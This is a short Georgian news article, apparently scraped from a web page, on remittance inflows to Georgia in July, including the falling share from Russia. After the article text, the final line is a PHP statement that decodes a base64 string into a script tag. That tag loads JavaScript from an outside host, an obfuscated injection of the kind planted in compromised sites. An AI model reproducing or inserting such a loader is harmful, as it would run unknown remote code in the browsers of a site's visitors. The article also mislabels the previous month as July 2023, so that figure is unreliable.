celsiusi
ავერსი საქკაბელი

ეროვნული ბანკის მონაცემებით, ივლისში ქვეყანაში შემოსული ფულადი გზავნილების მოცულობამ 301.1 მლნ დოლარი შეადგინა, რაც 1.6%-ით (5 მლნ დოლარით) ნაკლებია 2022 წლის ივლისის მაჩვენებელზე.

ფულადი გზავნილები შემცირებულია წინა თვესთან შედარებითაც, რადგან 2023 წლის ივლისში ქვეყანაში გზავნილების სახით 353 მლნ დოლარი შემოვიდა. შესაბამისად, გზავნილები თითქმის 15%-ით არის შემცირებული.

7 თვის მონაცემებით კი საქართველოში ჯამში 2.6 მლრდ დოლარის გადმორიცხვა მოხდა და აქედან რუსეთიდან გზავნილები 1.2 მილიარდს შეადგენს, ანუ მთლიანი გზავნილების თითქმის ნახევარი რუსეთზე მოდის.

ივლისშიც ფულადი გზავნილების ყველაზე დიდი მოცულობა კვლავ რუსეთიდან გადმოირიცხა და მისმა მოცულობამ 73.8 მლნ დოლარი შეადგინა. 2022 წლის ივლისში ქვეყანამ ფულადი გზავნილების სახით რუსეთისგან 100.5 მლნ დოლარი მიიღო შესაბამისად, წლიურად რუსეთიდან გზავნილები თითქმის 27%-ით არის შემცირებული.

489
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");